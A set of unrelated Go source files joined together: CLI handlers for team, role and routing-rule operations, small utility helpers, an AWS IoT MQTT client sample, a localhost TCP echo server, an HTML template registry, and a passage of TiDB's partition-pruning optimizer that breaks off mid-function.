deleteRoutingRuleRequest := &team.DeleteRoutingRuleRequest{}
if teamName, ok := getVal("name",c); ok {
deleteRoutingRuleRequest = &team.DeleteRoutingRuleRequest{
TeamIdentifierType: team.Name,
TeamIdentifierValue: teamName,
}
} else if teamID, ok := getVal("id", c); ok {
deleteRoutingRuleRequest = &team.DeleteRoutingRuleRequest{
TeamIdentifierType: team.Id,
TeamIdentifierValue: teamID,
}
}
if ruleID, ok := getVal("ruleId", c); ok {
deleteRoutingRuleRequest.RoutingRuleId = ruleID
}
resp, err := teamCli.DeleteRoutingRule(context.Background(), deleteRoutingRuleRequest)
printResponse(resp, err, c)
}
func GetTeamRoleAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
getTeamRoleRequest := &team.GetTeamRoleRequest{}
if teamName, ok := getVal("teamName",c); ok {
getTeamRoleRequest.TeamName = teamName
} else if teamID, ok := getVal("teamId",c);ok {
getTeamRoleRequest.TeamID = teamID
}
if roleName, ok := getVal("roleName",c); ok {
getTeamRoleRequest.RoleName = roleName
} else if roleID, ok := getVal("roleId",c);ok {
getTeamRoleRequest.RoleID = roleID
}
resp, err := teamCli.GetRole(context.Background(), getTeamRoleRequest)
printResponse(resp, err, c)
}
func DeleteTeamRoleAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
deleteTeamRoleRequest := &team.DeleteTeamRoleRequest{}
if teamName, ok := getVal("teamName",c); ok {
deleteTeamRoleRequest.TeamName = teamName
} else if teamID, ok := getVal("teamId",c);ok {
deleteTeamRoleRequest.TeamID = teamID
}
if roleName, ok := getVal("roleName",c); ok {
deleteTeamRoleRequest.RoleName = roleName
} else if roleID, ok := getVal("roleId",c);ok {
deleteTeamRoleRequest.RoleID = roleID
}
resp, err := teamCli.DeleteRole(context.Background(), deleteTeamRoleRequest)
printResponse(resp, err, c)
}
func AddMemberAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
addMemberRequest := &team.AddTeamMemberRequest{}
if teamName, ok := getVal("teamName",c); ok {
addMemberRequest.TeamIdentifierType = team.Name
addMemberRequest.TeamIdentifierValue = teamName
} else if teamID, ok := getVal("teamId", c); ok {
addMemberRequest.TeamIdentifierType = team.Id
addMemberRequest.TeamIdentifierValue = teamID
}
if role, ok := getVal("role",c); ok {
addMemberRequest.Role = role
}
if userID, ok := getVal("userId",c); ok {
addMemberRequest.User.ID = userID
} else if userName, ok := getVal("userName",c); ok {
addMemberRequest.User.Username = userName
}
resp, err := teamCli.AddMember(context.Background(), addMemberRequest)
printResponse(resp, err, c)
}
func RemoveMemberAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
removeMemberRequest := &team.RemoveTeamMemberRequest{}
if teamName, ok := getVal("teamName",c); ok {
removeMemberRequest.TeamIdentifierType = team.Name
removeMemberRequest.TeamIdentifierValue = teamName
} else if teamID, ok := getVal("teamId", c); ok {
removeMemberRequest.TeamIdentifierType = team.Id
removeMemberRequest.TeamIdentifierValue = teamID
}
if userID, ok := getVal("userId",c); ok {
removeMemberRequest.MemberIdentifierType = team.Id
removeMemberRequest.MemberIdentifierValue = userID
} else if userName, ok := getVal("userName",c); ok {
removeMemberRequest.MemberIdentifierType = team.Username
removeMemberRequest.MemberIdentifierValue = userName
}
resp, err := teamCli.RemoveMember(context.Background(), removeMemberRequest)
printResponse(resp, err, c)
}
func GetRoutingRuleAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
getRoutingRuleRequest := &team.GetRoutingRuleRequest{}
if teamName, ok := getVal("teamName",c); ok {
getRoutingRuleRequest.TeamIdentifierType = team.Name
getRoutingRuleRequest.TeamIdentifierValue = teamName
} else if teamID, ok := getVal("teamId", c); ok {
getRoutingRuleRequest.TeamIdentifierType = team.Id
getRoutingRuleRequest.TeamIdentifierValue = teamID
}
if ruleID, ok := getVal("ruleId",c); ok {
getRoutingRuleRequest.RoutingRuleId = ruleID
}
resp, err := teamCli.GetRoutingRule(context.Background(), getRoutingRuleRequest)
printResponse(resp, err, c)
}
func ListTeamLogsAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
listLogsRequest := &team.ListTeamLogsRequest{}
if teamName, ok := getVal("name", c); ok {
listLogsRequest.IdentifierType = team.Name
listLogsRequest.IdentifierValue = teamName
} else if teamID, ok:= getVal("id", c); ok{
listLogsRequest.IdentifierType = team.Id
listLogsRequest.IdentifierValue = teamID
}
if limit, ok := getVal("limit", c); ok {
limit, err := strconv.Atoi(limit)
if err != nil {
os.Exit(2)
}
listLogsRequest.Limit = limit
}
if offset, ok := getVal("offset", c); ok {
offset, err := strconv.Atoi(offset)
if err != nil {
os.Exit(2)
}
listLogsRequest.Offset = offset
}
if order, ok := getVal("order", c); ok {
listLogsRequest.Order = order
}
resp, err := teamCli.ListTeamLogs(context.Background(), listLogsRequest)
printResponse(resp, err, c)
}
func printResponse(resp interface{},err error, c *gcli.Context) {
if err != nil {
os.Exit(1)
}
isPretty := c.IsSet("pretty")
output, err := resultToJSON(resp, isPretty)
if err != nil {
printMessage(ERROR,err.Error())
os.Exit(1)
}
printMessage(INFO,output)
}
|
package tool
import (
"crypto/rand"
"crypto/sha256"
"net"
"os"
"time"
)
//FillBytesToFront 把数据截取/填充到指定长度
func FillBytesToFront(data []byte, totalLen int) []byte {
if len(data) < totalLen {
delta := totalLen - len(data)
appendByte := []byte{}
for delta != 0 {
appendByte = append(appendByte, 0)
delta--
}
return append(appendByte, data...)
}
return data[:totalLen]
}
//SHA256 对数据进行SHA256 Hash
func SHA256(data []byte) []byte {
hash := sha256.New()
hash.Write(data)
return hash.Sum(nil)
}
//SliceByteWhenEncount 如果遇到了
func SliceByteWhenEncount(d []byte, encount byte) []byte {
for i, bb := range d {
if bb != encount {
return d[i:]
}
}
return nil
}
//RandomString 产生随机字符串
func RandomString(n int) string {
alphanum := "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
var bytes = make([]byte, n)
rand.Read(bytes)
for i, b := range bytes {
bytes[i] = alphanum[b%byte(len(alphanum))]
}
return string(bytes)
}
//GenerateBytes 根据长度和每个byte的数据,产生bytes
func GenerateBytes(length int, b byte) []byte {
bytes := []byte{}
for length != 0 {
bytes = append(bytes, b)
length--
}
return bytes
}
//Timeout 定时任务,时间到触发channel
func Timeout(t time.Duration) chan bool {
i := make(chan bool)
go func() {
time.Sleep(t)
i <- true
}()
return i
}
//GetIpAddress 获取当前ip
func GetIpAddress() ([]string, error) {
name, err := os.Hostname()
if err != nil {
return nil, err
}
addrs, err := net.LookupHost(name)
if err != nil {
return nil, err
}
return addrs, nil
}
|
package main
import (
"crypto/tls"
"crypto/x509"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"time"
MQTT "github.com/eclipse/paho.mqtt.golang"
)
// Config holds all the AQS IoT properties
type Config struct {
Host string `json:"host"`
Port int `json:"port"`
CaCert string `json:"caCert"`
ClientCert string `json:"clientCert"`
PrivateKey string `json:"privateKey"`
}
func getSettingsFromFile(p string, opts *MQTT.ClientOptions) error {
var conf, err = readFromConfigFile(p)
if err != nil {
return err
}
var tlsConfig, err2 = makeTLSConfig(conf.CaCert, conf.ClientCert, conf.PrivateKey)
if err2 != nil {
return err2
}
opts.SetTLSConfig(tlsConfig)
var brokerURI = fmt.Sprintf("ssl://%s:%d", conf.Host, conf.Port)
opts.AddBroker(brokerURI)
return nil
}
func readFromConfigFile(path string) (Config, error) {
var ret = Config{}
var b, err = ioutil.ReadFile(path)
if err != nil {
return ret, err
}
err = json.Unmarshal(b, &ret)
if err != nil {
return ret, err
}
return ret, nil
}
func makeTLSConfig(cafile, cert, key string) (*tls.Config, error) {
var TLSConfig = &tls.Config{InsecureSkipVerify: false}
var certPool *x509.CertPool
var err error
var tlsCert tls.Certificate
certPool, err = getCertPool(cafile)
if err != nil {
return nil, err
}
TLSConfig.RootCAs = certPool
certPool, err = getCertPool(cert)
if err != nil {
return nil, err
}
TLSConfig.ClientAuth = tls.RequireAndVerifyClientCert
TLSConfig.ClientCAs = certPool
tlsCert, err = tls.LoadX509KeyPair(cert, key)
if err != nil {
return nil, err
}
TLSConfig.Certificates = []tls.Certificate{tlsCert}
return TLSConfig, nil
}
func getCertPool(pemPath string) (*x509.CertPool, error) {
var pemData, err = ioutil.ReadFile(pemPath)
if err != nil {
return nil, err
}
var certs = x509.NewCertPool()
certs.AppendCertsFromPEM(pemData)
return certs, nil
}
// ArgOption holds command line arguments
type ArgOption struct {
Conf string
ClientID string
}
// NewOption creates new AWS IoT options (from a configuration file)
func NewOption(args *ArgOption) (*MQTT.ClientOptions, error) {
var opts *MQTT.ClientOptions = MQTT.NewClientOptions()
err := getSettingsFromFile(args.Conf, opts)
if err != nil {
return nil, err
}
opts.SetClientID(args.ClientID)
opts.SetAutoReconnect(true)
return opts, nil
}
//define a function for the default message handler
var f MQTT.MessageHandler = func(client MQTT.Client, msg MQTT.Message) {
fmt.Printf("TOPIC: %s\n", msg.Topic())
fmt.Printf("MSG: %s\n", msg.Payload())
}
var args ArgOption
func main() {
flag.StringVar(&args.Conf, "conf", "", "Config file JSON path and name for accessing to AWS IoT endpoint")
flag.StringVar(&args.ClientID, "client-id", "", "client id to connect with")
flag.Parse()
opts, err := NewOption(&args)
if err != nil {
panic(err)
}
opts.SetDefaultPublishHandler(f)
//create and start a client using the above ClientOptions
c := MQTT.NewClient(opts)
if token := c.Connect(); token.Wait() && token.Error() != nil {
panic(token.Error())
}
//subscribe to the topic /go-mqtt/sample and request messages to be delivered
//at a maximum qos of zero, wait for the receipt to confirm the subscription
if token := c.Subscribe("go-mqtt/sample", 0, nil); token.Wait() && token.Error() != nil {
panic(token.Error())
}
//Publish 5 messages to /go-mqtt/sample at qos 1 and wait for the receipt
//from the server after sending each message
for i := 0; i < 5; i++ {
text := fmt.Sprintf("this is msg #%d!", i)
token := c.Publish("go-mqtt/sample", 0, false, text)
token.Wait()
}
time.Sleep(3 * time.Second)
//unsubscribe from /go-mqtt/sample
if token := c.Unsubscribe("go-mqtt/sample"); token.Wait() && token.Error() != nil {
panic(token.Error())
}
c.Disconnect(250)
}
|
package main
import (
"fmt"
"net"
)
const HOST = "localhost"
const PORT = "52535"
func main() {
fmt.Println("Starting Server")
listener, err := net.Listen("tcp", HOST+":"+PORT)
if err != nil {
fmt.Println("Error Listening", err.Error())
panic(err)
}
for {
conn, err := listener.Accept()
if err != nil {
fmt.Println("Error Accepting", err.Error())
panic(err)
}
go handleConn(conn)
}
}
func handleConn(conn net.Conn) {
for {
buf := make([]byte, 1024)
byteNum, err := conn.Read(buf)
if err != nil {
fmt.Println("Error reading", err.Error())
}
fmt.Printf("Receivng data: %d,%v \r\n", byteNum, string(buf))
}
}
|
package main
import (
"html/template"
)
var tmpl = make(map[string]*template.Template)
func init() {
m := template.Must
p := template.ParseFiles
tmpl["index"] = m(p("templates/index.gohtml", "templates/layout.gohtml"))
tmpl["event-detail"] = m(p("templates/event-detail.gohtml", "templates/layout.gohtml"))
tmpl["about"] = m(p("templates/aboutpage.gohtml", "templates/layout.gohtml"))
tmpl["event-new"] = m(p("templates/event-new.gohtml", "templates/layout.gohtml"))
tmpl["event-search"] = m(p("templates/search.gohtml", "templates/layout.gohtml"))
tmpl["event-category"] = m(p("templates/searchcategory.gohtml", "templates/layout.gohtml"))
}
|
// Copyright 2018 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package core
import (
"bytes"
"cmp"
"context"
"fmt"
gomath "math"
"slices"
"sort"
"strings"
"github.com/pingcap/errors"
"github.com/pingcap/tidb/expression"
"github.com/pingcap/tidb/parser/ast"
"github.com/pingcap/tidb/parser/model"
"github.com/pingcap/tidb/parser/mysql"
"github.com/pingcap/tidb/sessionctx"
"github.com/pingcap/tidb/table"
"github.com/pingcap/tidb/table/tables"
"github.com/pingcap/tidb/types"
"github.com/pingcap/tidb/util/chunk"
"github.com/pingcap/tidb/util/collate"
"github.com/pingcap/tidb/util/mathutil"
"github.com/pingcap/tidb/util/plancodec"
"github.com/pingcap/tidb/util/ranger"
"github.com/pingcap/tidb/util/set"
)
// FullRange represent used all partitions.
const FullRange = -1
// partitionProcessor rewrites the ast for table partition.
// Used by static partition prune mode.
/*
// create table t (id int) partition by range (id)
// (partition p1 values less than (10),
// partition p2 values less than (20),
// partition p3 values less than (30))
//
// select * from t is equal to
// select * from (union all
// select * from p1 where id < 10
// select * from p2 where id < 20
// select * from p3 where id < 30)
*/
// partitionProcessor is here because it's easier to prune partition after predicate push down.
type partitionProcessor struct{}
func (s *partitionProcessor) optimize(_ context.Context, lp LogicalPlan, opt *logicalOptimizeOp) (LogicalPlan, error) {
p, err := s.rewriteDataSource(lp, opt)
return p, err
}
func (s *partitionProcessor) rewriteDataSource(lp LogicalPlan, opt *logicalOptimizeOp) (LogicalPlan, error) {
// Assert there will not be sel -> sel in the ast.
switch p := lp.(type) {
case *DataSource:
return s.prune(p, opt)
case *LogicalUnionScan:
ds := p.Children()[0]
ds, err := s.prune(ds.(*DataSource), opt)
if err != nil {
return nil, err
}
if ua, ok := ds.(*LogicalPartitionUnionAll); ok {
// Adjust the UnionScan->Union->DataSource1, DataSource2 ... to
// Union->(UnionScan->DataSource1), (UnionScan->DataSource2)
children := make([]LogicalPlan, 0, len(ua.Children()))
for _, child := range ua.Children() {
us := LogicalUnionScan{
conditions: p.conditions,
handleCols: p.handleCols,
}.Init(ua.SCtx(), ua.SelectBlockOffset())
us.SetChildren(child)
children = append(children, us)
}
ua.SetChildren(children...)
return ua, nil
}
// Only one partition, no union all.
p.SetChildren(ds)
return p, nil
case *LogicalCTE:
return lp, nil
default:
children := lp.Children()
for i, child := range children {
newChild, err := s.rewriteDataSource(child, opt)
if err != nil {
return nil, err
}
children[i] = newChild
}
}
return lp, nil
}
// partitionTable is for those tables which implement partition.
type partitionTable interface {
PartitionExpr() *tables.PartitionExpr
}
func generateHashPartitionExpr(ctx sessionctx.Context, pi *model.PartitionInfo, columns []*expression.Column, names types.NameSlice) (expression.Expression, error) {
schema := expression.NewSchema(columns...)
exprs, err := expression.ParseSimpleExprsWithNames(ctx, pi.Expr, schema, names)
if err != nil {
return nil, err
}
exprs[0].HashCode(ctx.GetSessionVars().StmtCtx)
return exprs[0], nil
}
func getPartColumnsForHashPartition(hashExpr expression.Expression) ([]*expression.Column, []int) {
partCols := expression.ExtractColumns(hashExpr)
colLen := make([]int, 0, len(partCols))
for i := 0; i < len(partCols); i++ {
partCols[i].Index = i
colLen = append(colLen, types.UnspecifiedLength)
}
return partCols, colLen
}
func (s *partitionProcessor) getUsedHashPartitions(ctx sessionctx.Context,
tbl table.Table, partitionNames []model.CIStr, columns []*expression.Column,
conds []expression.Expression, names types.NameSlice) ([]int, []expression.Expression, error) {
pi := tbl.Meta().Partition
hashExpr, err := generateHashPartitionExpr(ctx, pi, columns, names)
if err != nil {
return nil, nil, err
}
partCols, colLen := getPartColumnsForHashPartition(hashExpr)
detachedResult, err := ranger.DetachCondAndBuildRangeForPartition(ctx, conds, partCols, colLen, ctx.GetSessionVars().RangeMaxSize)
if err != nil {
return nil, nil, err
}
ranges := detachedResult.Ranges
used := make([]int, 0, len(ranges))
for _, r := range ranges {
if !r.IsPointNullable(ctx) {
// processing hash partition pruning. eg:
// create table t2 (a int, b bigint, index (a), index (b)) partition by hash(a) partitions 10;
// desc select * from t2 where t2.a between 10 and 15;
// determine whether the partition key is int
if col, ok := hashExpr.(*expression.Column); ok && col.RetType.EvalType() == types.ETInt {
numPartitions := len(pi.Definitions)
posHigh, highIsNull, err := hashExpr.EvalInt(ctx, chunk.MutRowFromDatums(r.HighVal).ToRow())
if err != nil {
return nil, nil, err
}
posLow, lowIsNull, err := hashExpr.EvalInt(ctx, chunk.MutRowFromDatums(r.LowVal).ToRow())
if err != nil {
return nil, nil, err
}
// consider whether the range is closed or open
if r.LowExclude {
posLow++
}
if r.HighExclude {
posHigh--
}
var rangeScalar float64
if mysql.HasUnsignedFlag(col.RetType.GetFlag()) {
rangeScalar = float64(uint64(posHigh)) - float64(uint64(posLow)) // use float64 to avoid integer overflow
} else {
rangeScalar = float64(posHigh) - float64(posLow) // use float64 to avoid integer overflow
}
// if range is less than the number of partitions, there will be unused partitions we can prune out.
if rangeScalar < float64(numPartitions) && !highIsNull && !lowIsNull {
for i := posLow; i <= posHigh; i++ {
idx := mathutil.Abs(i % int64(pi.Num))
if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
continue
}
used = append(used, int(idx))
}
continue
}
// issue:#22619
if col.RetType.GetType() == mysql.TypeBit {
// maximum number of partitions is 8192
if col.RetType.GetFlen() > 0 && col.RetType.GetFlen() < int(gomath.Log2(mysql.PartitionCountLimit)) {
// all possible hash values
maxUsedPartitions := 1 << col.RetType.GetFlen()
if maxUsedPartitions < numPartitions {
for i := 0; i < maxUsedPartitions; i++ {
used = append(used, i)
}
continue
}
}
}
}
used = []int{FullRange}
break
}
if !r.HighVal[0].IsNull() {
if len(r.HighVal) != len(partCols) {
used = []int{-1}
break
}
}
highLowVals := make([]types.Datum, 0, len(r.HighVal)+len(r.LowVal))
highLowVals = append(highLowVals, r.HighVal...)
highLowVals = append(highLowVals, r.LowVal...)
pos, isNull, err := hashExpr.EvalInt(ctx, chunk.MutRowFromDatums(highLowVals).ToRow())
if err != nil {
// If we failed to get the point position, we can just skip and ignore it.
continue
}
if isNull {
pos = 0
}
idx := mathutil.Abs(pos % int64(pi.Num))
if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
continue
}
used = append(used, int(idx))
}
return used, detachedResult.RemainedConds, nil
}
func (s *partitionProcessor) getUsedKeyPartitions(ctx sessionctx.Context,
tbl table.Table, partitionNames []model.CIStr, columns []*expression.Column,
conds []expression.Expression, _ types.NameSlice) ([]int, []expression.Expression, error) {
pi := tbl.Meta().Partition
partExpr := tbl.(partitionTable).PartitionExpr()
partCols, colLen := partExpr.GetPartColumnsForKeyPartition(columns)
pe := &tables.ForKeyPruning{KeyPartCols: partCols}
detachedResult, err := ranger.DetachCondAndBuildRangeForPartition(ctx, conds, partCols, colLen, ctx.GetSessionVars().RangeMaxSize)
if err != nil {
return nil, nil, err
}
ranges := detachedResult.Ranges
used := make([]int, 0, len(ranges))
for _, r := range ranges {
if !r.IsPointNullable(ctx) {
if len(partCols) == 1 && partCols[0].RetType.EvalType() == types.ETInt {
col := partCols[0]
posHigh, highIsNull, err := col.EvalInt(ctx, chunk.MutRowFromDatums(r.HighVal).ToRow())
if err != nil {
return nil, nil, err
}
posLow, lowIsNull, err := col.EvalInt(ctx, chunk.MutRowFromDatums(r.LowVal).ToRow())
if err != nil {
return nil, nil, err
}
// consider whether the range is closed or open
if r.LowExclude {
posLow++
}
if r.HighExclude {
posHigh--
}
var rangeScalar float64
if mysql.HasUnsignedFlag(col.RetType.GetFlag()) {
rangeScalar = float64(uint64(posHigh)) - float64(uint64(posLow)) // use float64 to avoid integer overflow
} else {
rangeScalar = float64(posHigh) - float64(posLow) // use float64 to avoid integer overflow
}
// if range is less than the number of partitions, there will be unused partitions we can prune out.
if rangeScalar < float64(pi.Num) && !highIsNull && !lowIsNull {
for i := posLow; i <= posHigh; i++ {
d := types.NewIntDatum(i)
idx, err := pe.LocateKeyPartition(pi.Num, []types.Datum{d})
if err != nil {
// If we failed to get the point position, we can just skip and ignore it.
continue
}
if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
continue
}
used = append(used, idx)
}
continue
}
}
used = []int{FullRange}
break
}
if len(r.HighVal) != len(partCols) {
used = []int{FullRange}
break
}
colVals := make([]types.Datum, 0, len(r.HighVal))
colVals = append(colVals, r.HighVal...)
idx, err := pe.LocateKeyPartition(pi.Num, colVals)
if err != nil {
// If we failed to get the point position, we can just skip and ignore it.
continue
}
if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[idx].Name.L) {
continue
}
used = append(used, idx)
}
return used, detachedResult.RemainedConds, nil
}
// getUsedPartitions is used to get used partitions for hash or key partition tables
func (s *partitionProcessor) getUsedPartitions(ctx sessionctx.Context, tbl table.Table,
partitionNames []model.CIStr, columns []*expression.Column, conds []expression.Expression,
names types.NameSlice, partType model.PartitionType) ([]int, []expression.Expression, error) {
if partType == model.PartitionTypeHash {
return s.getUsedHashPartitions(ctx, tbl, partitionNames, columns, conds, names)
}
return s.getUsedKeyPartitions(ctx, tbl, partitionNames, columns, conds, names)
}
// findUsedPartitions is used to get used partitions for hash or key partition tables.
// The first returning is the used partition index set pruned by `conds`.
// The second returning is the filter conditions which should be kept after pruning.
func (s *partitionProcessor) findUsedPartitions(ctx sessionctx.Context,
tbl table.Table, partitionNames []model.CIStr, conds []expression.Expression,
columns []*expression.Column, names types.NameSlice) ([]int, []expression.Expression, error) {
pi := tbl.Meta().Partition
used, remainedConds, err := s.getUsedPartitions(ctx, tbl, partitionNames, columns, conds, names, pi.Type)
if err != nil {
return nil, nil, err
}
if len(partitionNames) > 0 && len(used) == 1 && used[0] == FullRange {
or := partitionRangeOR{partitionRange{0, len(pi.Definitions)}}
return s.convertToIntSlice(or, pi, partitionNames), nil, nil
}
slices.Sort(used)
ret := used[:0]
for i := 0; i < len(used); i++ {
if i == 0 || used[i] != used[i-1] {
ret = append(ret, used[i])
}
}
return ret, remainedConds, nil
}
func (s *partitionProcessor) convertToIntSlice(or partitionRangeOR, pi *model.PartitionInfo, partitionNames []model.CIStr) []int {
if len(or) == 1 && or[0].start == 0 && or[0].end == len(pi.Definitions) {
if len(partitionNames) == 0 {
return []int{FullRange}
}
}
ret := make([]int, 0, len(or))
for i := 0; i < len(or); i++ {
for pos := or[i].start; pos < or[i].end; pos++ {
if len(partitionNames) > 0 && !s.findByName(partitionNames, pi.Definitions[pos].Name.L) {
continue
}
ret = append(ret, pos)
}
}
return ret
}
func convertToRangeOr(used []int, pi *model.PartitionInfo) partitionRangeOR {
if len(used) == 1 && used[0] == -1 {
return fullRange(len(pi.Definitions))
}
ret := make(partitionRangeOR, 0, len(used))
for _, i := range used {
ret = append(ret, partitionRange{i, i + 1})
}
return ret
}
// pruneHashOrKeyPartition is used to prune hash or key partition tables
func (s *partitionProcessor) pruneHashOrKeyPartition(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr,
conds []expression.Expression, columns []*expression.Column, names types.NameSlice) ([]int, error) {
used, _, err := s.findUsedPartitions(ctx, tbl, partitionNames, conds, columns, names)
if err != nil {
return nil, err
}
return used, nil
}
// reconstructTableColNames reconstructs FieldsNames according to ds.TblCols.
// ds.names may not match ds.TblCols since ds.names is pruned while ds.TblCols contains all original columns.
// please see https://github.com/pingcap/tidb/issues/22635 for more details.
func (*partitionProcessor) reconstructTableColNames(ds *DataSource) ([]*types.FieldName, error) {
names := make([]*types.FieldName, 0, len(ds.TblCols))
// Use DeletableCols to get all the columns.
colsInfo := ds.table.DeletableCols()
colsInfoMap := make(map[int64]*table.Column, len(colsInfo))
for _, c := range colsInfo {
colsInfoMap[c.ID] = c
}
for _, colExpr := range ds.TblCols {
if colExpr.ID == model.ExtraHandleID {
names = append(names, &types.FieldName{
DBName: ds.DBName,
TblName: ds.tableInfo.Name,
ColName: model.ExtraHandleName,
OrigColName: model.ExtraHandleName,
})
continue
}
if colExpr.ID == model.ExtraPidColID {
names = append(names, &types.FieldName{
DBName: ds.DBName,
TblName: ds.tableInfo.Name,
ColName: model.ExtraPartitionIdName,
OrigColName: model.ExtraPartitionIdName,
})
continue
}
if colExpr.ID == model.ExtraPhysTblID {
names = append(names, &types.FieldName{
DBName: ds.DBName,
TblName: ds.tableInfo.Name,
ColName: model.ExtraPhysTblIdName,
OrigColName: model.ExtraPhysTblIdName,
})
continue
}
if colInfo, found := colsInfoMap[colExpr.ID]; found {
names = append(names, &types.FieldName{
DBName: ds.DBName,
TblName: ds.tableInfo.Name,
ColName: colInfo.Name,
OrigTblName: ds.tableInfo.Name,
OrigColName: colInfo.Name,
})
continue
}
return nil, errors.Trace(fmt.Errorf("information of column %v is not found", colExpr.String()))
}
return names, nil
}
func (s *partitionProcessor) processHashOrKeyPartition(ds *DataSource, pi *model.PartitionInfo, opt *logicalOptimizeOp) (LogicalPlan, error) {
names, err := s.reconstructTableColNames(ds)
if err != nil {
return nil, err
}
used, err := s.pruneHashOrKeyPartition(ds.SCtx(), ds.table, ds.partitionNames, ds.allConds, ds.TblCols, names)
if err != nil {
return nil, err
}
if used != nil {
return s.makeUnionAllChildren(ds, pi, convertToRangeOr(used, pi), opt)
}
tableDual := LogicalTableDual{RowCount: 0}.Init(ds.SCtx(), ds.SelectBlockOffset())
tableDual.schema = ds.Schema()
appendNoPartitionChildTraceStep(ds, tableDual, opt)
return tableDual, nil
}
// listPartitionPruner uses to prune partition for list partition.
type listPartitionPruner struct {
*partitionProcessor
ctx sessionctx.Context
pi *model.PartitionInfo
partitionNames []model.CIStr
fullRange map[int]struct{}
listPrune *tables.ForListPruning
}
func newListPartitionPruner(ctx sessionctx.Context, tbl table.Table, partitionNames []model.CIStr, s *partitionProcessor, pruneList *tables.ForListPruning, columns []*expression.Column) *listPartitionPruner {
pruneList = pruneList.Clone()
for i := range pruneList.PruneExprCols {
for j := range columns {
if columns[j].ID == pruneList.PruneExprCols[i].ID {
pruneList.PruneExprCols[i].UniqueID = columns[j].UniqueID
break
}
}
}
for i := range pruneList.ColPrunes {
for j := range columns {
if columns[j].ID == pruneList.ColPrunes[i].ExprCol.ID {
pruneList.ColPrunes[i].ExprCol.UniqueID = columns[j].UniqueID
break
}
}
}
fullRange := make(map[int]struct{})
fullRange[FullRange] = struct{}{}
return &listPartitionPruner{
partitionProcessor: s,
ctx: ctx,
pi: tbl.Meta().Partition,
partitionNames: partitionNames,
fullRange: fullRange,
listPrune: pruneList,
}
}
func (l *listPartitionPruner) locatePartition(cond expression.Expression) (tables.ListPartitionLocation, bool, error) {
switch sf := cond.(type) {
case *expression.Constant:
b, err := sf.Value.ToBool(l.ctx.GetSessionVars().StmtCtx)
if err == nil && b == 0 {
// A constant false expression.
return nil, false, nil
}
case *expression.ScalarFunction:
switch sf.FuncName.L {
case ast.LogicOr:
dnfItems := expression.FlattenDNFConditions(sf)
return l.locatePartitionByDNFCondition(dnfItems)
case ast.LogicAnd:
cnfItems := expression.FlattenCNFConditions(sf)
return l.locatePartitionByCNFCondition(cnfItems)
}
return l.locatePartitionByColumn(sf)
}
return nil, true, nil
}
func (l *listPartitionPruner) locatePartitionByCNFCondition(conds []expression.Expression) (tables.ListPartitionLocation, bool, error) {
if len(conds) == 0 {
return nil, true, nil
}
countFull := 0
helper := tables.NewListPartitionLocationHelper()
for _, cond := range conds {
cnfLoc, isFull, err := l.locatePartition(cond)
if err != nil {
return nil, false, err
}
if isFull {
countFull++
continue
}
if cnfLoc.IsEmpty() {
// No partition for intersection, just return no partitions.
return nil, false, nil
}
if !helper.Intersect(cnfLoc) {
return nil, false, nil
}
}
if countFull == len(conds) {
return nil, true, nil
}
return helper.GetLocation(), false, nil
}
func (l *listPartitionPruner) locatePartitionByDNFCondition(conds []expression.Expression) (tables.ListPartitionLocation, bool, error) {
if len(conds) == 0 {
return nil, true, nil
}
helper := tables.NewListPartitionLocationHelper()
for _, cond := range conds {
dnfLoc, isFull, err := l.locatePartition(cond)
if err != nil || isFull {
return nil, isFull, err
}
helper.Union(dnfLoc)
}
return helper.GetLocation(), false, nil
}
// locatePartitionByColumn uses to locate partition by the one of the list columns value.
// Such as: partition by list columns(a,b) (partition p0 values in ((1,1),(2,2)), partition p1 values in ((6,6),(7,7)));
// and if the condition is `a=1`, then we can use `a=1` and the expression `(a in (1,2))` to locate partition `p0`.
func (l *listPartitionPruner) locatePartitionByColumn(cond *expression.ScalarFunction) (tables.ListPartitionLocation, bool, error) {
condCols := expression.ExtractColumns(cond)
if len(condCols) != 1 {
return nil, true, nil
}
var colPrune *tables.ForListColumnPruning
for _, cp := range l.listPrune.ColPrunes {
if cp.ExprCol.ID == condCols[0].ID {
colPrune = cp
break
}
}
if colPrune == nil {
return nil, true, nil
}
return l.locateColumnPartitionsByCondition(cond, colPrune)
}
func (l *listPartitionPruner) locateColumnPartitionsByCondition(cond expression.Expression, colPrune *tables.ForListColumnPruning) (tables.ListPartitionLocation, bool, error) {
ranges, err := l.detachCondAndBuildRange([]expression.Expression{cond}, colPrune.ExprCol)
if err != nil {
return nil, false, err
}
sc := l.ctx.GetSessionVars().StmtCtx
helper := tables.NewListPartitionLocationHelper()
for _, r := range ranges {
if len(r.LowVal) != 1 || len(r.HighVal) != 1 {
return nil, true, nil
}
var locations []tables.ListPartitionLocation
if r.IsPointNullable(l.ctx) {
location, err := colPrune.LocatePartition(sc, r.HighVal[0])
if types.ErrOverflow.Equal(err) {
return nil, true, nil // return full-scan if over-flow
}
if err != nil {
return nil, false, err
}
if colPrune.HasDefault() {
if location == nil || len(l.listPrune.ColPrunes) > 1 {
if location != nil {
locations = append(locations, location)
}
location = tables.ListPartitionLocation{
tables.ListPartitionGroup{
PartIdx: l.listPrune.GetDefaultIdx(),
GroupIdxs: []int{-1}, // Special group!
},
}
}
}
locations = append(locations, location)
} else {
locations, err = colPrune.LocateRanges(sc, r, l.listPrune.GetDefaultIdx())
if types.ErrOverflow.Equal(err) {
return nil, true, nil // return full-scan if over-flow
}
if err != nil {
return nil, false, err
}
